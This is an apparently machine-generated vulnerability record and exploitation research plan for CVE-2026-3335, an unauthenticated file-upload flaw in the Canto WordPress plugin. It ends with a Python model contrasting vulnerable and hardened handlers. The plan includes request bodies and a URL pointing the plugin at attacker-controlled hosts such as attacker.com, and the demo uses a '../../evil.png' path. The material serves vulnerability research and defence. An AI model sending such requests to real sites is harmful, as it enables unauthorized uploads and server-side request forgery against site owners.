[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKxuISA_X6X_zISe8RHOwwcvk82_tsjXCs8aw05bXfHU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-3335","canto-missing-authorization-to-unauthenticated-file-upload","Canto \u003C= 3.1.1 - Missing Authorization to Unauthenticated File Upload","The Canto plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.1.1 via the `\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php` file. This is due to the file being directly accessible without any authentication, authorization, or nonce checks, and the `fbc_flight_domain` and `fbc_app_api` URL components being accepted as user-supplied POST parameters rather than read from admin-configured options. Since the attacker controls both the destination server and the `fbc_app_token` value, the entire fetch-and-upload chain is attacker-controlled — the server never contacts Canto's legitimate API, and the uploaded file originates entirely from the attacker's infrastructure. 
This makes it possible for unauthenticated attackers to upload arbitrary files (constrained to WordPress-allowed MIME types) to the WordPress uploads directory. Additional endpoints (`detail.php`, `download.php`, `get.php`, `tree.php`) are also directly accessible without authentication and make requests using a user-supplied `app_api` parameter combined with an admin-configured subdomain.","canto",null,"\u003C=3.1.1","3.1.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-20 15:13:52","2026-05-12 19:57:44",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0777f759-6980-4572-a866-0210bd5f5085?source=api-prod",53,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3335 (Canto \u003C= 3.1.1)\n\n## 1. Vulnerability Summary\nThe **Canto** plugin for WordPress is vulnerable to **Unauthenticated Arbitrary File Upload** (restricted to WordPress-allowed MIME types) due to missing authorization and improper input validation in the standalone PHP file `\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php`. \n\nThe core issue is that this file can be accessed directly without loading the WordPress environment's standard security checks (if accessed before `wp-load.php` or if it includes `wp-load.php` without checking `is_user_logged_in()`). Furthermore, the script accepts critical configuration parameters—`fbc_flight_domain`, `fbc_app_api`, and `fbc_app_token`—directly from POST\u002FGET requests. An attacker can point these parameters to a server they control, causing the WordPress server to fetch and \"sideload\" a file from the attacker's infrastructure into the WordPress Media Library.\n\n## 2. 
Attack Vector Analysis\n*   **Vulnerable Endpoint:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php`\n*   **Alternative Endpoints (Inferred):** `detail.php`, `download.php`, `get.php`, `tree.php` (likely in the same directory).\n*   **Attack Type:** Missing Authorization \u002F Unauthenticated File Upload via SSRF-like fetch.\n*   **Parameters:**\n    *   `fbc_flight_domain`: The domain of the \"Canto\" instance to fetch from (attacker-controlled).\n    *   `fbc_app_api`: The API path\u002Fendpoint on the remote server.\n    *   `fbc_app_token`: The authentication token for the remote server (attacker-defined).\n    *   `name` (inferred): Likely the filename to save as.\n    *   `id` or `path` (inferred): Likely the identifier of the file on the remote server.\n*   **Authentication:** None required.\n\n## 3. Code Flow\n1.  **Direct Request:** An unauthenticated user sends a POST request to `copy-media.php`.\n2.  **Parameter Extraction:** The script reads `$_POST['fbc_flight_domain']`, `$_POST['fbc_app_api']`, and `$_POST['fbc_app_token']`.\n3.  **Request Construction:** The script constructs an HTTP request (likely using `wp_remote_get` or `curl`) to `https:\u002F\u002F{fbc_flight_domain}\u002F{fbc_app_api}\u002F...` using the provided token.\n4.  **Remote Fetch:** The WordPress server connects to the attacker-controlled domain.\n5.  **Sideloading:** The script receives the file content from the attacker's server and calls a WordPress function like `wp_handle_sideload()` or `media_handle_sideload()` to save the file into the `wp-content\u002Fuploads\u002F` directory and create an attachment in the database.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this endpoint is **directly accessible without any nonce checks**. 
\n*   No nonce is required because the file is accessed outside the standard `admin-ajax.php` or REST API flow where nonces are typically enforced.\n*   **Bypass Confirmation:** The research should confirm whether `copy-media.php` includes `wp-load.php`. The MIME-type constraint in the description implies the file goes through WordPress's own upload handling, so it almost certainly does; the defect is then the absence of an `is_user_logged_in()` or `current_user_can('upload_files')` check and of a nonce check, plus trusting `fbc_flight_domain`, `fbc_app_api` and `fbc_app_token` from POST instead of reading them with `get_option()`. If the script does not load WordPress and writes with raw `file_put_contents`, the MIME restriction would not apply and the issue would be more severe.\n\n## 5. Exploitation Strategy\n\n### Step 1: Attacker Infrastructure Setup\nThe attacker must host a file and an API endpoint that mimics the Canto API response.\n*   **Mock Canto API:** Run a minimal HTTP server (for example `python3 -m http.server` in a directory containing the payload, or any webhook service) that returns the file, with a matching Content-Type header, when queried at the expected path.\n*   **Payload:** A file named `exploit.png`. The description says uploads are constrained to WordPress-allowed MIME types, and WordPress's default list does not include SVG, so an SVG-with-XSS payload only works on sites that have explicitly enabled SVG uploads. A genuine PNG or JPEG, or a polyglot whose extension and sniffed type agree (WordPress checks this with `wp_check_filetype_and_ext()`), is the reliable choice.\n\n### Step 2: Triggering the Upload\nSend a POST request to the target's vulnerable script.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002F\u003Ctarget-ip>:8080\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters (Inferred from description):**\n    ```\n    fbc_flight_domain=attacker-controlled-server.com\n    &fbc_app_api=api\u002Fv1\u002Fget-file\n    &fbc_app_token=any-token\n    &name=malicious-image.png\n    &id=123\n    ```\n\n### Step 3: Response Analysis\nThe script will likely return a JSON response or a success message if the sideloading was successful.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install canto --version=3.1.1 --activate`\n2.  **Verify File Existence:** Confirm `\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php` exists.\n3.  
**Public Access Check:** Ensure the plugin directory allows direct execution of PHP files (standard in default WordPress installs).\n\n## 7. Expected Results\n*   The WordPress server makes an outbound HTTP request to the `fbc_flight_domain`.\n*   A new file appears in the `\u002Fwp-content\u002Fuploads\u002FYYYY\u002FMM\u002F` directory.\n*   A new entry is created in the `wp_posts` table with `post_type = 'attachment'`.\n*   The HTTP response from `copy-media.php` returns a `200 OK` status, possibly containing the ID or URL of the newly created attachment.\n\n## 8. Verification Steps\n1.  **Check Media Library:** Use WP-CLI to list recent attachments.\n    ```bash\n    wp post list --post_type=attachment --posts_per_page=5 --orderby=post_date --order=desc\n    ```\n2.  **Verify Filesystem:** Check for the presence of the file in the uploads folder.\n    ```bash\n    find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads -name \"malicious-image.png\"\n    ```\n3.  **Verify Unauthenticated Access:** Repeat the HTTP request without any cookies to confirm no session is required.\n\n## 9. Alternative Approaches\nIf `copy-media.php` requires specific parameters not fully detailed in the vulnerability description:\n1.  **Fuzzing Parameters:** Fuzz the script for common sideloading parameters like `file_url`, `url`, `download_url`, or `path`.\n2.  **Check Other Endpoints:** If `copy-media.php` is restricted, test `download.php` or `get.php` in the same directory. Per the description these combine the user-supplied `app_api` value with an admin-configured subdomain, so expect control of the path component rather than the host; the request below tests whether a full URL in `app_api` can override that host:\n    *   `http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fdownload.php?app_api=http:\u002F\u002Fattacker.com\u002Fmalicious.png`\n3.  **Information Leakage:** Test `tree.php` or `detail.php` to see whether they disclose internal paths or configuration when `app_api` is pointed at an unexpected path. Because the host comes from the admin-configured subdomain, an SSRF to a local resource requires that the subdomain and path concatenation can be escaped; confirm that before relying on it.","gemini-3-flash-preview","2026-04-18 00:55:21","2026-04-18 00:55:39",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcanto\u002Ftags"]
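The trust-boundary defect the description and the research plan above attribute to `copy-media.php` (remote host, API path and token accepted from POST by an endpoint with no login, capability or nonce check), modelled beside a hardened form. This is an added Python example written for this page; it is not the Canto plugin's PHP, not its 3.1.2 fix, and it does not reproduce the plugin's real parameter handling. The `Request`, `User` and `Uploads` types, the option keys, the HMAC nonce (a stand-in for `wp_create_nonce()`/`wp_verify_nonce()`), the `name` parameter and the MIME allowlist are all assumptions made for the example, and `fetch` stands in for the outbound `wp_remote_get()` so that it runs offline.

```python
"""Trust-boundary model for copy-media.php (added illustrative example).

Not the Canto plugin's PHP and not its 3.1.2 fix: a small Python model that
contrasts the shape the description gives for the vulnerable endpoint (remote
host, API path and token taken from POST; no login, capability or nonce check)
with a hardened handler that takes those values from stored options and checks
the caller first.  Request/User/Uploads, the option keys, the HMAC nonce, the
`name` parameter and the MIME allowlist are assumptions made for this example;
`fetch` stands in for the outbound wp_remote_get() so the model runs offline.
"""
import hmac
import os
from dataclasses import dataclass, field

# Assumed allowlist: WordPress's real one (get_allowed_mime_types()) is larger
# but likewise excludes SVG and PHP by default.
ALLOWED = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff", "image/gif": b"GIF8"}


@dataclass
class Request:
    post: dict


@dataclass
class User:
    logged_in: bool = False
    id: int = 0
    caps: set = field(default_factory=set)


class Uploads:
    """Stand-in for wp-content/uploads/: filename -> bytes."""
    def __init__(self):
        self.files = {}


def vulnerable_copy_media(req, fetch, uploads):
    """Vulnerable shape: anyone can call it, and the caller picks the server
    it fetches from, the API path, the token and the stored filename."""
    url = "https://{}/{}".format(req.post["fbc_flight_domain"], req.post["fbc_app_api"])
    ctype, body = fetch(url, req.post["fbc_app_token"])
    if ctype not in ALLOWED:                      # the only gate the description leaves in place
        return {"ok": False, "error": "type not allowed"}
    uploads.files[req.post["name"]] = body        # `name` is an assumed parameter
    return {"ok": True, "fetched": url, "file": req.post["name"]}


def make_nonce(secret, user_id):
    """Simplified stand-in for wp_create_nonce(): bound to a secret, an action and the user."""
    return hmac.new(secret, b"canto_copy_media|%d" % user_id, "sha256").hexdigest()


def hardened_copy_media(req, user, options, fetch, uploads, secret):
    """Hardened shape: authenticate, authorize, verify the nonce, then fetch only
    from the admin-configured host with the stored token, and never trust the
    client for the destination path or the file's type."""
    if not user.logged_in:
        return {"ok": False, "status": 401}
    if "upload_files" not in user.caps:           # current_user_can('upload_files') in WordPress
        return {"ok": False, "status": 403}
    if not hmac.compare_digest(req.post.get("_wpnonce", ""), make_nonce(secret, user.id)):
        return {"ok": False, "status": 403, "error": "bad nonce"}
    url = "https://{}/{}".format(options["fbc_flight_domain"], options["fbc_app_api"])
    ctype, body = fetch(url, options["fbc_app_token"])
    ext = ALLOWED.get(ctype)
    if ext is None or not body.startswith(MAGIC[ctype]):   # declared type must match the bytes
        return {"ok": False, "status": 415, "error": "type not allowed"}
    stem = os.path.splitext(os.path.basename(req.post.get("name", "file")))[0] or "file"
    uploads.files[stem + ext] = body              # basename only, extension forced from the type
    return {"ok": True, "fetched": url, "file": stem + ext}


def demo():
    """Constructed scenario: an anonymous caller points the endpoint at attacker.example."""
    png = MAGIC["image/png"] + b"\x00" * 16                     # constructed stub of a PNG body
    fetch = lambda url, token: ("image/png", png)               # offline stand-in for the HTTP fetch
    options = {"fbc_flight_domain": "configured.example",       # hostname assumed for the example
               "fbc_app_api": "api/v1", "fbc_app_token": "real-token"}
    attack = Request({"fbc_flight_domain": "attacker.example", "fbc_app_api": "api/v1/get-file",
                      "fbc_app_token": "any-token", "name": "../../evil.png"})
    vuln_uploads, hard_uploads = Uploads(), Uploads()
    r_vuln = vulnerable_copy_media(attack, fetch, vuln_uploads)
    r_anon = hardened_copy_media(attack, User(), options, fetch, hard_uploads, b"secret")
    editor = User(logged_in=True, id=7, caps={"upload_files"})
    legit = Request({**attack.post, "_wpnonce": make_nonce(b"secret", 7)})
    r_auth = hardened_copy_media(legit, editor, options, fetch, hard_uploads, b"secret")
    return r_vuln, r_anon, r_auth, sorted(vuln_uploads.files), sorted(hard_uploads.files)


if __name__ == "__main__":
    for r in demo():
        print(r)
```

Running `demo()` shows the contrast the description draws: the vulnerable handler fetches from `attacker.example` and stores whatever filename the caller supplied, while the hardened handler answers an anonymous caller with 401 and, for a logged-in user with a valid nonce, fetches from the configured host only and stores a basename with an extension derived from the verified type. In real plugin code the equivalent checks are `is_user_logged_in()`, `current_user_can('upload_files')` and `check_ajax_referer()`, with the host, API path and token read via `get_option()`.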